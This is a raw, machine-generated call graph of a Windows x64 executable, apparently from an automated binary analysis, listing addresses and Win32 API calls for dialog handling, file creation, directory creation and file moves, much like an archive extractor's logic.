7ff754548d34 26299->26301 26306 7ff754548de8 26299->26306 26303 7ff754548de3 26301->26303 26304 7ff754548d91 26301->26304 26307 7ff754548d42 BuildCatchObjectHelperInternal 26301->26307 26793 7ff754541f80 33 API calls 3 library calls 26303->26793 26304->26307 26308 7ff7545721d0 33 API calls 26304->26308 26794 7ff754542004 33 API calls std::_Xinvalid_argument 26306->26794 26307->25986 26308->26307 26313 7ff75456efb0 26309->26313 26310 7ff75456efd7 26311 7ff754572320 _handle_error 8 API calls 26310->26311 26312 7ff75456b537 26311->26312 26323 7ff75455aae0 26312->26323 26313->26310 26795 7ff75454bd0c 33 API calls 26313->26795 26315 7ff75456f02a 26316 7ff754541150 33 API calls 26315->26316 26317 7ff75456f03f 26316->26317 26318 7ff754541fa0 31 API calls 26317->26318 26320 7ff75456f04f BuildCatchObjectHelperInternal 26317->26320 26318->26320 26319 7ff754541fa0 31 API calls 26321 7ff75456f076 26319->26321 26320->26319 26322 7ff754541fa0 31 API calls 26321->26322 26322->26310 26324 7ff75455aaf3 26323->26324 26796 7ff754559774 26324->26796 26327 7ff75455ab58 LoadStringW 26328 7ff75455ab86 26327->26328 26329 7ff75455ab71 LoadStringW 26327->26329 26330 7ff75455da98 26328->26330 26329->26328 26815 7ff75455d874 26330->26815 26333 7ff75456f0a4 26849 7ff75456ae1c PeekMessageW 26333->26849 26336 7ff75456f0f5 26340 7ff75456f101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 26336->26340 26337 7ff75456f143 IsDlgButtonChecked IsDlgButtonChecked 26338 7ff75456f189 26337->26338 26339 7ff75456f1a4 IsDlgButtonChecked 26337->26339 26338->26339 26341 7ff75456f1c6 IsDlgButtonChecked IsDlgButtonChecked 26339->26341 26342 7ff75456f1c3 26339->26342 26340->26337 26343 7ff75456f218 IsDlgButtonChecked 26341->26343 26344 7ff75456f1f3 IsDlgButtonChecked 26341->26344 26342->26341 26345 7ff754572320 _handle_error 8 API calls 26343->26345 26344->26343 26346 7ff75456b578 26345->26346 26346->26039 26348 7ff75455309d 26347->26348 26355 7ff754552f8e 26347->26355 26349 7ff754572320 _handle_error 8 API calls 26348->26349 26350 7ff7545530b3 26349->26350 26350->26064 26350->26065 26351 7ff754553077 26351->26348 26352 7ff754553684 56 API calls 26351->26352 26352->26348 26353 7ff75454129c 33 API calls 26353->26355 26355->26351 26355->26353 26356 7ff7545530c8 26355->26356 26854 7ff754553684 26355->26854 26357 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26356->26357 26358 7ff7545530cd 26357->26358 26360 7ff754557fcf 26359->26360 26361 7ff754557fd2 SetCurrentDirectoryW 26359->26361 26360->26361 26361->26081 26363 7ff754544255 26362->26363 26364 7ff75454426a 26363->26364 26365 7ff75454129c 33 API calls 26363->26365 26366 7ff754572320 _handle_error 8 API calls 26364->26366 26365->26364 26367 7ff7545442a1 26366->26367 26368 7ff754543c84 26367->26368 26369 7ff754543cab 26368->26369 26987 7ff75454710c 26369->26987 26371 7ff754543cbb BuildCatchObjectHelperInternal 26371->26122 26373 7ff754541fb3 26372->26373 26374 7ff754541fdc 26372->26374 26373->26374 26375 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26373->26375 26374->26135 26376 7ff754542000 26375->26376 26379 7ff75455216a 26377->26379 26378 7ff75455219e 26381 7ff754556a0c 49 API calls 26378->26381 26389 7ff75455227f 26378->26389 26379->26378 26380 7ff7545521b1 CreateFileW 26379->26380 26380->26378 26384 7ff754552209 26381->26384 26382 7ff7545522af 26383 7ff754572320 _handle_error 8 API calls 26382->26383 26386 7ff7545522c4 26383->26386 26387 7ff75455220d CreateFileW 26384->26387 26388 7ff754552246 26384->26388 26385 7ff7545420b0 33 API calls 26385->26382 26386->26160 26386->26161 26387->26388 26388->26389 26390 7ff7545522d8 26388->26390 26389->26382 26389->26385 26391 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26390->26391 26392 7ff7545522dd 26391->26392 26394 7ff754552066 26393->26394 26395 7ff754552072 26393->26395 26394->26395 26999 7ff7545520d0 26394->26999 27006 7ff75456aa08 26397->27006 26399 7ff75456d1ee 26400 7ff754541fa0 31 API calls 26399->26400 26401 7ff75456d1f7 26400->26401 26403 7ff754572320 _handle_error 8 API calls 26401->26403 26402 7ff75455d22c 33 API calls 26546 7ff75456cf03 BuildCatchObjectHelperInternal 26402->26546 26404 7ff75456bc2b 26403->26404 26404->26168 26405 7ff75456eefa 27139 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 26405->27139 26408 7ff75454129c 33 API calls 26408->26546 26409 7ff75456ef00 27140 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 26409->27140 26411 7ff75456ef06 26416 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26411->26416 26413 7ff75456eeee 26414 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26413->26414 26415 7ff75456eef4 26414->26415 27138 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 26415->27138 26418 7ff75456ef0c 26416->26418 26420 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26418->26420 26422 7ff75456ef12 26420->26422 26421 7ff75456ee4a 26423 7ff75456eed2 26421->26423 26425 7ff7545420b0 33 API calls 26421->26425 26424 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26422->26424 27136 7ff754541f80 33 API calls 3 library calls 26423->27136 26429 7ff75456ef18 26424->26429 26432 7ff75456ee77 26425->26432 26426 7ff75456eee8 27137 7ff754542004 33 API calls std::_Xinvalid_argument 26426->27137 26427 7ff7545413a4 33 API calls 26428 7ff75456dc3a GetTempPathW 26427->26428 26428->26546 26436 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26429->26436 26430 7ff7545562dc 35 API calls 26430->26546 27135 7ff75456abe8 33 API calls 3 library calls 26432->27135 26435 7ff754542520 SetDlgItemTextW 26435->26546 26441 7ff75456ef1e 26436->26441 26439 7ff75456ee8d 26445 7ff754541fa0 31 API calls 26439->26445 26446 7ff75456eea4 BuildCatchObjectHelperInternal 26439->26446 26440 7ff75457bb8c 43 API calls 26440->26546 26447 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26441->26447 26443 7ff754541fa0 31 API calls 26443->26423 26444 7ff75456e7f3 26444->26423 26444->26426 26448 7ff7545721d0 33 API calls 26444->26448 26455 7ff75456e83b BuildCatchObjectHelperInternal 26444->26455 26445->26446 26446->26443 26449 7ff75456ef24 26447->26449 26448->26455 26454 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26449->26454 26451 7ff75456aa08 33 API calls 26451->26546 26452 7ff75456ef6c 27143 7ff754542004 33 API calls std::_Xinvalid_argument 26452->27143 26453 7ff7545420b0 33 API calls 26453->26546 26459 7ff75456ef2a 26454->26459 26463 7ff7545420b0 33 API calls 26455->26463 26502 7ff75456eb8f 26455->26502 26457 7ff754541fa0 31 API calls 26457->26421 26458 7ff75456ef78 27145 7ff754542004 33 API calls std::_Xinvalid_argument 26458->27145 26469 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26459->26469 26460 7ff75456ef72 27144 7ff754541f80 33 API calls 3 library calls 26460->27144 26462 7ff75456ef66 27142 7ff754541f80 33 API calls 3 library calls 26462->27142 26470 7ff75456e963 26463->26470 26466 7ff75456ed40 26466->26458 26466->26460 26482 7ff75456ed3b BuildCatchObjectHelperInternal 26466->26482 26487 7ff7545721d0 33 API calls 26466->26487 26468 7ff75456ec2a 26468->26452 26468->26462 26477 7ff75456ec72 BuildCatchObjectHelperInternal 26468->26477 26468->26482 26484 7ff7545721d0 33 API calls 26468->26484 26474 7ff75456ef30 26469->26474 26476 7ff75456ef60 26470->26476 26483 7ff75454129c 33 API calls 26470->26483 26473 7ff7545699c8 31 API calls 26473->26546 26488 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26474->26488 26475 7ff754553d34 51 API calls 26475->26546 27141 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 26476->27141 27049 7ff75456f4e0 26477->27049 26479 7ff75456d5e9 GetDlgItem 26485 7ff754542520 SetDlgItemTextW 26479->26485 26482->26457 26489 7ff75456e9a6 26483->26489 26484->26477 26490 7ff75456d608 IsDlgButtonChecked 26485->26490 26487->26482 26492 7ff75456ef36 26488->26492 27131 7ff75455d22c 26489->27131 26490->26546 26491 7ff7545532bc 51 API calls 26491->26546 26497 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26492->26497 26495 7ff754555b60 53 API calls 26495->26546 26496 7ff75455dc2c 33 API calls 26496->26546 26501 7ff75456ef3c 26497->26501 26498 7ff75456d63c IsDlgButtonChecked 26498->26546 26500 7ff754553f30 54 API calls 26500->26546 26505 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26501->26505 26502->26466 26502->26468 26507 7ff75456ef54 26502->26507 26511 7ff75456ef5a 26502->26511 26510 7ff75456ef42 26505->26510 26508 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26507->26508 26508->26511 26509 7ff754548d04 33 API calls 26509->26546 26515 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26510->26515 26512 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26511->26512 26512->26476 26513 7ff754544228 33 API calls 26513->26546 26518 7ff75456ef48 26515->26518 26516 7ff754555820 33 API calls 26516->26546 26517 7ff7545532a8 51 API calls 26517->26546 26521 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26518->26521 26519 7ff754555aa8 33 API calls 26519->26546 26520 7ff75454e164 33 API calls 26520->26546 26523 7ff75456ef4e 26521->26523 26522 7ff75454250c SetDlgItemTextW 26522->26546 26528 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26523->26528 26526 7ff754541150 33 API calls 26526->26546 26527 7ff7545613c4 CompareStringW 26537 7ff75456e9d1 26527->26537 26528->26507 26530 7ff754541fa0 31 API calls 26530->26537 26531 7ff754542034 33 API calls 26531->26546 26532 7ff75454129c 33 API calls 26532->26537 26533 7ff754542674 31 API calls 26533->26546 26535 7ff75456df99 EndDialog 26535->26546 26537->26502 26537->26518 26537->26523 26537->26527 26537->26530 26537->26532 26538 7ff75455d22c 33 API calls 26537->26538 26538->26537 26539 7ff75456db21 MoveFileW 26540 7ff75456db55 MoveFileExW 26539->26540 26541 7ff75456db70 26539->26541 26540->26541 26543 7ff754541fa0 31 API calls 26541->26543 26541->26546 26542 7ff754541fa0 31 API calls 26542->26546 26543->26541 26544 7ff754552f58 56 API calls 26544->26546 26546->26399 26546->26402 26546->26405 26546->26408 26546->26409 26546->26411 26546->26413 26546->26415 26546->26418 26546->26421 26546->26422 26546->26427 26546->26429 26546->26430 26546->26435 26546->26440 26546->26441 26546->26444 26546->26449 26546->26451 26546->26453 26546->26459 26546->26473 26546->26474 26546->26475 26546->26491 26546->26492 26546->26495 26546->26496 26546->26498 26546->26500 26546->26501 26546->26509 26546->26510 26546->26513 26546->26516 26546->26517 26546->26519 26546->26520 26546->26522 26546->26526 26546->26531 26546->26533 26546->26535 26546->26539 26546->26542 26546->26544 27010 7ff7545613c4 CompareStringW 26546->27010 27011 7ff75456a440 26546->27011 27087 7ff75455cfa4 35 API calls _invalid_parameter_noinfo_noreturn 26546->27087 27088 7ff7545695b4 33 API calls Concurrency::cancel_current_task 26546->27088 27089 7ff754570684 31 API calls _invalid_parameter_noinfo_noreturn 26546->27089 27090 7ff75454df4c 47 API calls BuildCatchObjectHelperInternal 26546->27090 27091 7ff75456a834 33 API calls _invalid_parameter_noinfo_noreturn 26546->27091 27092 7ff754569518 33 API calls 26546->27092 27093 7ff75456abe8 33 API calls 3 library calls 26546->27093 27094 7ff754557368 33 API calls 2 library calls 26546->27094 27095 7ff754554088 33 API calls 26546->27095 27096 7ff7545565b0 33 API calls 3 library calls 26546->27096 27097 7ff7545572cc 26546->27097 27101 7ff754541744 33 API calls 4 library calls 26546->27101 27102 7ff7545531bc 26546->27102 27116 7ff754553ea0 FindClose 26546->27116 27117 7ff7545613f4 CompareStringW 26546->27117 27118 7ff754569cd0 47 API calls 26546->27118 27119 7ff7545687d8 51 API calls 3 library calls 26546->27119 27120 7ff75456ab54 33 API calls _handle_error 26546->27120 27121 7ff754557df4 26546->27121 27129 7ff754555b08 CompareStringW 26546->27129 27130 7ff754557eb0 47 API calls 26546->27130 26548 7ff75456f9a3 26547->26548 26549 7ff7545420b0 33 API calls 26548->26549 26551 7ff75456f9b9 26549->26551 26550 7ff75456f9ee 27159 7ff75454e34c 26550->27159 26551->26550 26552 7ff7545420b0 33 API calls 26551->26552 26552->26550 26554 7ff75456fa4b 27179 7ff75454e7a8 26554->27179 26558 7ff75456fa61 26559 7ff754572320 _handle_error 8 API calls 26558->26559 26560 7ff75456bc52 26559->26560 26560->26183 28289 7ff75456849c 26562->28289 26565 7ff75456f4b7 26567 7ff754572320 _handle_error 8 API calls 26565->26567 26566 7ff75456f3c7 GetWindow 26571 7ff75456f3e2 26566->26571 26568 7ff75456be9b 26567->26568 26568->25945 26568->25946 26569 7ff75456f3ee GetClassNameW 28294 7ff7545613c4 CompareStringW 26569->28294 26571->26565 26571->26569 26572 7ff75456f417 GetWindowLongPtrW 26571->26572 26573 7ff75456f496 GetWindow 26571->26573 26572->26573 26574 7ff75456f429 IsDlgButtonChecked 26572->26574 26573->26565 26573->26571 26574->26573 26575 7ff75456f445 GetObjectW 26574->26575 28295 7ff754568504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26575->28295 26578 7ff75456f461 28296 7ff7545684cc 26578->28296 28300 7ff754568df4 16 API calls _handle_error 26578->28300 26580 7ff75456f479 IsDlgButtonChecked DeleteObject 26580->26573 26582 7ff754556300 26581->26582 26588 7ff75455638d 26581->26588 26583 7ff7545413a4 33 API calls 26582->26583 26584 7ff75455631b GetCurrentDirectoryW 26583->26584 26585 7ff754556341 26584->26585 26586 7ff7545420b0 33 API calls 26585->26586 26587 7ff75455634f 26586->26587 26587->26588 26589 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26587->26589 26588->25962 26590 7ff7545563a9 26589->26590 26592 7ff75454252a SetDlgItemTextW 26591->26592 26593 7ff754542527 26591->26593 26594 7ff7545ae2e0 26592->26594 26593->26592 26595->25972 26597 7ff754542516 SetDlgItemTextW 26596->26597 26598 7ff754542513 26596->26598 26598->26597 26600 7ff75454139b 26599->26600 26601 7ff7545412d0 26599->26601 28304 7ff754542004 33 API calls std::_Xinvalid_argument 26600->28304 26604 7ff754541338 26601->26604 26605 7ff754541396 26601->26605 26608 7ff7545412de BuildCatchObjectHelperInternal 26601->26608 26607 7ff7545721d0 33 API calls 26604->26607 26604->26608 28303 7ff754541f80 33 API calls 3 library calls 26605->28303 26607->26608 26608->26006 26609->26032 26611 7ff7545532bc 51 API calls 26610->26611 26612 7ff7545532b1 26611->26612 26612->26045 26612->26069 26613->26045 26615 7ff7545413a4 33 API calls 26614->26615 26616 7ff754556489 26615->26616 26617 7ff75455648c GetModuleFileNameW 26616->26617 26620 7ff7545564dc 26616->26620 26618 7ff7545564de 26617->26618 26619 7ff7545564a7 26617->26619 26618->26620 26619->26616 26621 7ff75454129c 33 API calls 26620->26621 26623 7ff754556506 26621->26623 26622 7ff75455653e 26622->26109 26623->26622 26624 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26623->26624 26625 7ff754556560 26624->26625 26626->26127 26628 7ff7545420f6 26627->26628 26630 7ff7545420cb BuildCatchObjectHelperInternal 26627->26630 28305 7ff754541474 33 API calls 3 library calls 26628->28305 26630->26145 26631->26159 26632->26170 26633->26179 26634->26185 26635->26191 26637 7ff754573620 26636->26637 26637->26194 26638->26113 26640 7ff754541177 26639->26640 26641 7ff754542034 33 API calls 26640->26641 26642 7ff754541185 BuildCatchObjectHelperInternal 26641->26642 26642->26124 26644 7ff754542085 26643->26644 26646 7ff754542059 BuildCatchObjectHelperInternal 26643->26646 28306 7ff7545415b8 33 API calls 3 library calls 26644->28306 26646->26097 26648 7ff754572329 26647->26648 26649 7ff754572550 IsProcessorFeaturePresent 26648->26649 26650 7ff75456c350 26648->26650 26651 7ff754572568 26649->26651 28307 7ff754572744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26651->28307 26653 7ff75457257b 28308 7ff754572510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26653->28308 28309 7ff75457783c 31 API calls 3 library calls 26656->28309 26658 7ff75457791d 28310 7ff754577934 16 API calls abort 26658->28310 26661->26152 26662->26216 26663->26241 26664->26256 26665->26268 26691 7ff754553e28 26666->26691 26670 7ff75455a519 26671 7ff75455a589 26670->26671 26688 7ff75455a56a SetDlgItemTextW 26670->26688 26712 7ff754559800 26670->26712 26697 7ff754559408 26671->26697 26674 7ff75455a603 26676 7ff75455a60c GetWindowLongPtrW 26674->26676 26677 7ff75455a6c2 26674->26677 26675 7ff75455a6f2 GetSystemMetrics GetWindow 26678 7ff75455a821 26675->26678 26689 7ff75455a71d 26675->26689 26680 7ff7545ae2c0 26676->26680 26716 7ff7545595a8 26677->26716 26679 7ff754572320 _handle_error 8 API calls 26678->26679 26682 7ff75455a830 26679->26682 26683 7ff75455a6aa GetWindowRect 26680->26683 26682->26281 26683->26677 26686 7ff75455a6e5 SetDlgItemTextW 26686->26675 26687 7ff75455a73e GetWindowRect 26687->26689 26688->26670 26689->26678 26689->26687 26690 7ff75455a800 GetWindow 26689->26690 26690->26678 26690->26689 26692 7ff754553e4d _snwprintf 26691->26692 26725 7ff754579ef0 26692->26725 26695 7ff754560f68 WideCharToMultiByte 26696 7ff754560faa 26695->26696 26696->26670 26698 7ff7545595a8 47 API calls 26697->26698 26701 7ff75455944f 26698->26701 26699 7ff754572320 _handle_error 8 API calls 26700 7ff75455958e GetWindowRect GetClientRect 26699->26700 26700->26674 26700->26675 26702 7ff75454129c 33 API calls 26701->26702 26710 7ff75455955a 26701->26710 26703 7ff75455949c 26702->26703 26704 7ff7545595a1 26703->26704 26706 7ff75454129c 33 API calls 26703->26706 26705 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26704->26705 26707 7ff7545595a7 26705->26707 26708 7ff754559514 26706->26708 26709 7ff75455959c 26708->26709 26708->26710 26711 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26709->26711 26710->26699 26711->26704 26713 7ff754559840 26712->26713 26715 7ff754559869 26712->26715 26757 7ff75457a270 31 API calls 2 library calls 26713->26757 26715->26670 26717 7ff754553e28 swprintf 46 API calls 26716->26717 26718 7ff7545595eb 26717->26718 26719 7ff754560f68 WideCharToMultiByte 26718->26719 26720 7ff754559603 26719->26720 26721 7ff754559800 31 API calls 26720->26721 26722 7ff75455961b 26721->26722 26723 7ff754572320 _handle_error 8 API calls 26722->26723 26724 7ff75455962b 26723->26724 26724->26675 26724->26686 26726 7ff754579f4e 26725->26726 26727 7ff754579f36 26725->26727 26726->26727 26729 7ff754579f58 26726->26729 26752 7ff75457d69c 15 API calls abort 26727->26752 26754 7ff754577ef0 35 API calls 2 library calls 26729->26754 26730 7ff754579f3b 26753 7ff7545778e4 31 API calls _invalid_parameter_noinfo 26730->26753 26733 7ff754579f69 __scrt_get_show_window_mode 26755 7ff754577e70 15 API calls _set_fmode 26733->26755 26734 7ff754572320 _handle_error 8 API calls 26735 7ff754553e69 26734->26735 26735->26695 26737 7ff754579fd4 26756 7ff7545782f8 46 API calls 3 library calls 26737->26756 26739 7ff754579fdd 26740 7ff754579fe5 26739->26740 26741 7ff75457a014 26739->26741 26742 7ff75457d90c __free_lconv_mon 15 API calls 26740->26742 26743 7ff75457a06c 26741->26743 26744 7ff75457a023 26741->26744 26745 7ff75457a092 26741->26745 26747 7ff75457a01a 26741->26747 26751 7ff754579f46 26742->26751 26748 7ff75457d90c __free_lconv_mon 15 API calls 26743->26748 26746 7ff75457d90c __free_lconv_mon 15 API calls 26744->26746 26745->26743 26749 7ff75457a09c 26745->26749 26746->26751 26747->26743 26747->26744 26748->26751 26750 7ff75457d90c __free_lconv_mon 15 API calls 26749->26750 26750->26751 26751->26734 26752->26730 26753->26751 26754->26733 26755->26737 26756->26739 26757->26715 26770 7ff7545413a4 26758->26770 26761 7ff754542494 26762 7ff75454129c 33 API calls 26761->26762 26763 7ff7545424a2 26762->26763 26764 7ff7545424dd 26763->26764 26767 7ff754542505 26763->26767 26765 7ff754572320 _handle_error 8 API calls 26764->26765 26766 7ff7545424f3 26765->26766 26766->26290 26768 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26767->26768 26769 7ff75454250a 26768->26769 26771 7ff7545413ad 26770->26771 26772 7ff75454142d GetWindowTextW 26770->26772 26773 7ff7545413ce 26771->26773 26774 7ff75454143d 26771->26774 26772->26761 26778 7ff7545413db __scrt_get_show_window_mode 26773->26778 26780 7ff7545721d0 26773->26780 26790 7ff754542018 33 API calls std::_Xinvalid_argument 26774->26790 26789 7ff75454197c 31 API calls _invalid_parameter_noinfo_noreturn 26778->26789 26781 7ff7545721db 26780->26781 26782 7ff7545721f4 26781->26782 26783 7ff75457bbc0 abort 2 API calls 26781->26783 26784 7ff7545721fa 26781->26784 26782->26778 26783->26781 26785 7ff754572205 26784->26785 26791 7ff754572f7c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26784->26791 26792 7ff754541f80 33 API calls 3 library calls 26785->26792 26788 7ff75457220b 26789->26772 26791->26785 26792->26788 26793->26306 26795->26315 26803 7ff754559638 26796->26803 26799 7ff7545597d9 26801 7ff754572320 _handle_error 8 API calls 26799->26801 26800 7ff754559800 31 API calls 26800->26799 26802 7ff7545597f2 26801->26802 26802->26327 26802->26328 26804 7ff754559692 26803->26804 26812 7ff754559730 26803->26812 26805 7ff754560f68 WideCharToMultiByte 26804->26805 26806 7ff7545596c0 26804->26806 26805->26806 26811 7ff7545596ef 26806->26811 26813 7ff75455aa88 45 API calls _snwprintf 26806->26813 26807 7ff754572320 _handle_error 8 API calls 26808 7ff754559764 26807->26808 26808->26799 26808->26800 26814 7ff75457a270 31 API calls 2 library calls 26811->26814 26812->26807 26813->26811 26814->26812 26831 7ff75455d4d0 26815->26831 26819 7ff754579ef0 swprintf 46 API calls 26821 7ff75455d8e5 _snwprintf 26819->26821 26820 7ff75455d9a3 26823 7ff75455da17 26820->26823 26825 7ff75455da3f 26820->26825 26821->26819 26828 7ff75455d974 26821->26828 26845 7ff754549d78 33 API calls 26821->26845 26824 7ff754572320 _handle_error 8 API calls 26823->26824 26826 7ff75455da2b 26824->26826 26827 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26825->26827 26826->26333 26829 7ff75455da44 26827->26829 26828->26820 26846 7ff754549d78 33 API calls 26828->26846 26832 7ff75455d665 26831->26832 26834 7ff75455d502 26831->26834 26835 7ff75455cb80 26832->26835 26833 7ff754541744 33 API calls 26833->26834 26834->26832 26834->26833 26836 7ff75455cbb6 26835->26836 26843 7ff75455cc80 26835->26843 26837 7ff75455cbc6 26836->26837 26840 7ff75455cc7b 26836->26840 26842 7ff75455cc20 26836->26842 26837->26821 26847 7ff754541f80 33 API calls 3 library calls 26840->26847 26842->26837 26844 7ff7545721d0 33 API calls 26842->26844 26848 7ff754542004 33 API calls std::_Xinvalid_argument 26843->26848 26844->26837 26845->26821 26846->26820 26847->26843 26850 7ff75456ae3c GetMessageW 26849->26850 26851 7ff75456ae80 GetDlgItem 26849->26851 26852 7ff75456ae5b IsDialogMessageW 26850->26852 26853 7ff75456ae6a TranslateMessage DispatchMessageW 26850->26853 26851->26336 26851->26337 26852->26851 26852->26853 26853->26851 26855 7ff7545536b3 26854->26855 26856 7ff7545536e0 26855->26856 26858 7ff7545536cc CreateDirectoryW 26855->26858 26874 7ff7545532bc 26856->26874 26858->26856 26859 7ff75455377d 26858->26859 26861 7ff75455378d 26859->26861 26961 7ff754553d34 26859->26961 26865 7ff754572320 _handle_error 8 API calls 26861->26865 26862 7ff754553791 GetLastError 26862->26861 26867 7ff7545537b9 26865->26867 26867->26355 26868 7ff75455373b 26870 7ff754553774 26868->26870 26871 7ff7545537ce 26868->26871 26869 7ff754553720 CreateDirectoryW 26869->26868 26870->26859 26870->26862 26872 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26871->26872 26873 7ff7545537d3 26872->26873 26875 7ff7545532e7 GetFileAttributesW 26874->26875 26876 7ff7545532e4 26874->26876 26877 7ff7545532f8 26875->26877 26878 7ff754553375 26875->26878 26876->26875 26879 7ff754556a0c 49 API calls 26877->26879 26880 7ff754572320 _handle_error 8 API calls 26878->26880 26881 7ff75455331f 26879->26881 26882 7ff754553389 26880->26882 26883 7ff75455333c 26881->26883 26884 7ff754553323 GetFileAttributesW 26881->26884 26882->26862 26888 7ff754556a0c 26882->26888 26883->26878 26885 7ff754553399 26883->26885 26884->26883 26886 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26885->26886 26887 7ff75455339e 26886->26887 26889 7ff754556a4b 26888->26889 26906 7ff754556a44 26888->26906 26891 7ff75454129c 33 API calls 26889->26891 26890 7ff754572320 _handle_error 8 API calls 26892 7ff75455371c 26890->26892 26893 7ff754556a76 26891->26893 26892->26868 26892->26869 26894 7ff754556cc7 26893->26894 26895 7ff754556a96 26893->26895 26896 7ff7545562dc 35 API calls 26894->26896 26897 7ff754556ab0 26895->26897 26919 7ff754556b49 26895->26919 26900 7ff754556ce6 26896->26900 26898 7ff7545570ab 26897->26898 26975 7ff75454c098 33 API calls 2 library calls 26897->26975 26983 7ff754542004 33 API calls std::_Xinvalid_argument 26898->26983 26899 7ff754556eef 26902 7ff7545570cf 26899->26902 26980 7ff75454c098 33 API calls 2 library calls 26899->26980 26900->26899 26903 7ff754556d1b 26900->26903 26958 7ff754556b44 26900->26958 26986 7ff754542004 33 API calls std::_Xinvalid_argument 26902->26986 26909 7ff7545570bd 26903->26909 26978 7ff75454c098 33 API calls 2 library calls 26903->26978 26904 7ff7545570b1 26917 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26904->26917 26906->26890 26907 7ff754556b03 26920 7ff754541fa0 31 API calls 26907->26920 26927 7ff754556b15 BuildCatchObjectHelperInternal 26907->26927 26984 7ff754542004 33 API calls std::_Xinvalid_argument 26909->26984 26910 7ff7545570d5 26912 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26910->26912 26918 7ff7545570db 26912->26918 26913 7ff7545570a6 26924 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26913->26924 26914 7ff754556f56 26981 7ff7545411cc 33 API calls BuildCatchObjectHelperInternal 26914->26981 26925 7ff7545570b7 26917->26925 26931 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26918->26931 26926 7ff75454129c 33 API calls 26919->26926 26919->26958 26920->26927 26922 7ff7545570c3 26934 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26922->26934 26923 7ff754541fa0 31 API calls 26923->26958 26924->26898 26929 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26925->26929 26932 7ff754556bbe 26926->26932 26927->26923 26928 7ff754556f69 26982 7ff7545557ac 33 API calls BuildCatchObjectHelperInternal 26928->26982 26929->26909 26930 7ff754541fa0 31 API calls 26944 7ff754556df5 26930->26944 26935 7ff7545570e1 26931->26935 26976 7ff754555820 33 API calls 26932->26976 26937 7ff7545570c9 26934->26937 26985 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 26937->26985 26938 7ff754556d76 BuildCatchObjectHelperInternal 26938->26922 26938->26930 26939 7ff754556bd3 26977 7ff75454e164 33 API calls 2 library calls 26939->26977 26940 7ff754541fa0 31 API calls 26943 7ff754556fec 26940->26943 26946 7ff754541fa0 31 API calls 26943->26946 26949 7ff754556e21 26944->26949 26979 7ff754541744 33 API calls 4 library calls 26944->26979 26945 7ff754556f79 BuildCatchObjectHelperInternal 26945->26918 26945->26940 26948 7ff754556ff6 26946->26948 26947 7ff754541fa0 31 API calls 26951 7ff754556c6d 26947->26951 26952 7ff754541fa0 31 API calls 26948->26952 26949->26937 26953 7ff75454129c 33 API calls 26949->26953 26954 7ff754541fa0 31 API calls 26951->26954 26952->26958 26955 7ff754556ec2 26953->26955 26954->26958 26957 7ff754542034 33 API calls 26955->26957 26956 7ff754556be9 BuildCatchObjectHelperInternal 26956->26925 26956->26947 26959 7ff754556edf 26957->26959 26958->26904 26958->26906 26958->26910 26958->26913 26960 7ff754541fa0 31 API calls 26959->26960 26960->26958 26962 7ff754553d5b 26961->26962 26963 7ff754553d5e SetFileAttributesW 26961->26963 26962->26963 26964 7ff754553d74 26963->26964 26971 7ff754553df5 26963->26971 26965 7ff754556a0c 49 API calls 26964->26965 26967 7ff754553d99 26965->26967 26966 7ff754572320 _handle_error 8 API calls 26968 7ff754553e0a 26966->26968 26969 7ff754553dbc 26967->26969 26970 7ff754553d9d SetFileAttributesW 26967->26970 26968->26861 26969->26971 26972 7ff754553e1a 26969->26972 26970->26969 26971->26966 26973 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 26972->26973 26974 7ff754553e1f 26973->26974 26975->26907 26976->26939 26977->26956 26978->26938 26979->26949 26980->26914 26981->26928 26982->26945 26985->26902 26988 7ff75454713b 26987->26988 26989 7ff754547206 26987->26989 26993 7ff75454714b BuildCatchObjectHelperInternal 26988->26993 26996 7ff754543f48 33 API calls 2 library calls 26988->26996 26997 7ff75454704c 47 API calls BuildCatchObjectHelperInternal 26989->26997 26991 7ff75454720b 26994 7ff754547273 26991->26994 26998 7ff75454889c 8 API calls BuildCatchObjectHelperInternal 26991->26998 26993->26371 26994->26371 26996->26993 26997->26991 26998->26991 27000 7ff754552102 